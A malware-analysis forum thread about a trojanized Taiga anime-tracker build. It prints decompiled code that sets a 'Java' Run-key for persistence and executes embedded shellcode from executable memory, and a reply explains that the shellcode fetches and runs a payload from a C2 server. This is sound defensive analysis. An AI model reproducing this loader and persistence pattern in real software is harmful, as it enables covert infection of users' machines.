A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #30967  by EP_X0FF
 Sun Nov 05, 2017 3:09 am
Malware targeting viewers of the chinese porn cartoons. Modified version of Taiga (https://github.com/erengy/taiga/issues/489).

Masterpiece of code (f5 in idapro)
Code: Select all
  if ( GetModuleFileNameW(0, &Filename, 0x104u) != -1
    && !RegCreateKeyExW(
          HKEY_CURRENT_USER,
          L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
          0,
          0,
          0,
          0x20006u,
          0,
          &phkResult,
          0) )
  {
    RegSetValueExW(phkResult, L"Java", 0, 1u, (const BYTE *)&Filename, 2 * wcslen(&Filename) + 2);
  }
  v4 = VirtualAlloc(0, 0x18Bu, 0x1000u, 0x40u);
  qmemcpy(v4, &unk_412780, 0x18Bu);
  ((void (*)(void))v4)();
In attach modified taiga and downloader exe dropped by above shellcode and implemented also through shellcode. I don't have actual payload it downloads but also don't expect anything interesting from it (probably some of retarded ransomwares which is not interesting at all in any case).
Attachments
pass: infected
(2.52 MiB) Downloaded 45 times
 #30969  by sysopfb
 Sun Nov 05, 2017 8:49 pm
This has a pcap of it downloading a payload from when it was live. Kudos to any.run for reaching out to Bart on twitter about the pcap

https://app.any.run/tasks/010df394-dad9 ... 0892cde074

The decoded code from the embedded PE in the modified taiga program looks like it was based on metasploits receive asm code which just takes a dword value from the C2 then reads in that dword in size before RET jumping to the new code it downloaded from the C2.

There is also a pcap from when it was live on hybrid-analysis but the C2 didn't send anything which makes the code exit.